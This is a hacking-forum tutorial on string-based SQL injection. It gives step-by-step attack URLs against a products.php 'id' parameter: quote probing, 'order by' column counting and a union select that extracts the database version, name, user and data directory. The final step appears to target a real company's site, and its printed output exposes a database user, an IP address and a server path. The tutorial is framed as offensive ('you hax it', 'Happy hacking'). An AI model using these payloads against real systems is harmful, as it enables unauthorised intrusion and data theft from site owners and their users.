String based SQL Injection tutorial Version 2.0

This tutorial is what we can call an "update" from the former String based
Injection tutorial I wrote (which you can find here http://www.hackforums.net/showthread.php?tid=1405301 ).
The reason I made another tutorial on the same topic is that some people
requested a more detailed tut, with pictures. So here it is.

Lets get it on.

I have no knowledge in SQL Injection, is this tutorial usefull?
No, I suggest you read up some tutorials on Union based SQL Injection before attempting this technique.

Tutorial can be found here: http://www.hackforums.net/showthread.php?tid=1148283

When should I read/use this tutorial?
You should use this tutorial when you are stuck at the 'order by' command that is giving you NO error.

Will you help me VIA msn or TeamViewer if I have any problems?
No, I will not. But you are more than welcome to post your question/problem in this thread or send me a PM.

--

Problem: You have a site which gives your a SQL Error but when performing "order by" You don't get any errors.

Then you are probably going to have to use 'string based Injection'.

Here is how this works.


1.
We try this site:

Code:
http://www.target.co.uk/products.php?id=6'

Which gives us the Error:
Code:
There was an error, please try again later. Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''6'' ORDER BY orderID LIMIT 0, 3' at line 1

2.
Now we know it's vulnerable and moving over the the 'order by' command.

Code:
http://www.target.co.uk/products.php?id=6 order by 1--
This gives us a normal page

3.
We now try a large number with the 'order by', like this:
Code:
http://www.target.co.uk/products.php?id=6 order by 1000--
Hmm, still no error.

4.
We will now make some changes in the syntax.
We will put a ' after 6 and a +- after the hyphens (--).

Our syntax would now look like this:

Code:
http://www.target.co.uk/products.php?id=6' order by 1--+

This code gives ur no error, which is good.

5.
Now we try the same syntax, but with larger number:

Code:
http://www.target.co.uk/products.php?id=6' order by 1000--+

Finaly, this gives us this error:

Code:
There was an error, please try again later. Error: Unknown column '1000' in 'order clause'

6.
Now, we would like to find the column count, just like in union based, we try something like:

Code:
http://www.target.co.uk/products.php?id=6' order by 13--+

No error, which means the column count is higher than 13 (you know the deal).


7.
Now we try:

Code:
http://www.target.co.uk/products.php?id=6' order by 14--+

Which gives ur error:
Code:
There was an error, please try again later. Error: Unknown column '14' in 'order clause'

8.
Now the injection works just like in 'union based'.

Code:
http://www.target.co.uk/products.php?id=-6' union select 1,2,3,4,5,6,7,8,9,10,11,12,13--+

The output is:
Code:
There was an error, please try again later.
2
6
Read More...

4

Page 1 1 |

9.
Now, you hax it.

Code:
http://www.matrixinnovations.co.uk/products.php?id=-6' union select 1,concat(version(),0x3a,database(),0x3a,user(),0x3a,@@datadir),3,4,5,6,7,8,9,10, ​11,12,13--+

Output:
Code:
There was an error, please try again later.
5.1.56-community-log:web183-newmatrix:web183-newmatrix@79.170.40.183:/var/lib/mysql/
6
Read More...

I hope you liked my tutorial, if you have any questions feel free to post or PM.

Happy hacking.

-
Cowards die many times before their deaths